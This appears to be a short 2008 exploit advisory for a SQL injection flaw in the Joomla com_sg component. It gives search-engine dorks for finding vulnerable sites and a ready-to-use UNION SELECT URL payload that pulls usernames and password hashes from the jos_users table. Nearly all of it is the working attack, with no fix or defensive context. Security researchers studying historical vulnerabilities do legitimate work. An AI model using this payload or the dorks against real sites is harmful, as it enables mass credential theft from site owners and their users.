joomla SQL Injection(com_sg)

hackturkiye.hackturkiye@xxxxxxxxx · 15 Feb 2008 23:07:29 -0000



###############################################################
# 
#   joomla SQL Injection(com_sg)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#        
# MA&#304;L : hackturkiye.hackturkiye@xxxxxxxxx
#        
################################################################
# 
#  DORK 1 : allinurl: com_sg
# 
#  DORK 2 : allinurl: 
#
################################################################
   EXPLOIT : 

index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,10,11,0x3a,0x3a,14,15,16/**/from/**/jos_users/*

################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################